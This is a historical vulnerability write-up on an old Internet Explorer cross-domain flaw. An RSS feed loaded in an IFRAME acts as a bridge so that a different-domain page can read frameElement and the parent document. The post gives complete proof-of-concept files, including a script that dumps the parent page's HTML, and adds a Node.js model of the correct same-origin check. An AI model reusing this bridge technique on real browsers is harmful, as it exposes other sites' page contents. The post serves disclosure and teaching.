The same frameElement leak that works with XAML also works with an RSS/XML file. Loading an XML feed inside an IFRAME and clicking a link in it that points to a different-domain HTML page gives that HTML page access to frameElement and, through it, the parent document. The XML acts as an origin-neutral bridge, just like XAML.
index.html:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>xDom_XML_FEEDS_frameElement</title></head>
<body>
<center>
<font face="Tahoma" size="2">
<h1>xDom_XML_FEEDS_frameElement</h1>
Very simple crossDomain using a xml file as a "bridge" to get the frameElement:<br /><br />
</center>
1) Load an <b>xml</b> inside an IFRAME. <font color="red">It doesn't matter if it is or not in a different domain</font>.<br />
2) That xml has a link ("Please, click here to load...") to an HTML <u>in a different domain</u>. Click on it.<br />
3) The HTML is able to read the frameElement with no restrictions at all.<br />
<br /><br />
<center>
<iframe src="I_CAN_BE_IN_ANY_DOMAIN_FEEDS.xml" width="400" height="200"></iframe><br /><br />
</center>
</font>
</body>
</html>
I_CAN_BE_IN_ANY_DOMAIN_FEEDS.xml:
<rss version="2.0">
<channel>
<title>Please, click here to load a file located in a different domain</title>
<link>http://www.iframe.com/crash/20/I_SHOUD_BE_IN_A_DIFFERENT_DOMAIN.html</link>
</channel>
</rss>
I_SHOUD_BE_IN_A_DIFFERENT_DOMAIN.html:
<script language="JavaScript">
alert(frameElement.ownerDocument.body.outerHTML);
</script>
IE’s feed viewer renders RSS/XML files with clickable links. When a link in a feed navigates the IFRAME to an HTML page on a different domain, the origin context from the XML isn’t correctly carried over to the new document, leaving frameElement accessible. This is the XML counterpart to the XAML variant found the same day.
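The check that should hold after the link click, as an added example (not code from the original post): a small Node.js model of the same-origin gate on `frameElement`, replaying the navigation sequence from the steps above. The hosts `site-a.example` and `feeds.example` are constructed assumptions, since the page does not say where index.html or the feed were hosted, and the model ignores `document.domain`.

```javascript
// Added illustration, not code from the original post.
// Model of the same-origin gate on window.frameElement (document.domain ignored).

// Serialized origin (scheme://host:port) of a URL, or null for opaque origins
// such as data: URLs. URL.origin already drops default ports.
function originOf(url) {
  const o = new URL(url).origin;
  return o === "null" ? null : o;
}

// The gate: the frame's current document may see frameElement only if it is
// same-origin with the document that contains the <iframe>.
function frameElementVisible(embedderUrl, currentUrl) {
  const a = originOf(embedderUrl);
  const b = originOf(currentUrl);
  return a !== null && a === b;
}

// Replay a frame's navigations and evaluate the gate after each one. The
// decision uses only (embedder, current document); the document that held the
// clicked link contributes nothing to it.
function replay(embedderUrl, navigations) {
  let current = embedderUrl;
  return navigations.map((target) => {
    current = new URL(target, current).href; // resolve relative links
    return { url: current, visible: frameElementVisible(embedderUrl, current) };
  });
}

// Constructed hosts (assumptions): site-a.example serves index.html,
// feeds.example serves the feed in the second scenario.
const EMBEDDER = "http://site-a.example/index.html";
const TARGET = "http://www.iframe.com/crash/20/I_SHOUD_BE_IN_A_DIFFERENT_DOMAIN.html";

// Scenario 1: feed on the embedder's own domain, then the link is clicked.
const sameDomainFeed = replay(EMBEDDER, ["I_CAN_BE_IN_ANY_DOMAIN_FEEDS.xml", TARGET]);
// Scenario 2: feed on a third domain, then the link is clicked.
const otherDomainFeed = replay(EMBEDDER, [
  "http://feeds.example/I_CAN_BE_IN_ANY_DOMAIN_FEEDS.xml", TARGET]);

console.log(sameDomainFeed.map((s) => s.visible));  // [ true, false ]
console.log(otherDomainFeed.map((s) => s.visible)); // [ false, false ]
```

In both scenarios the final step is `false`: wherever the feed is hosted, the cross-domain HTML page must not receive the embedding element.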
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.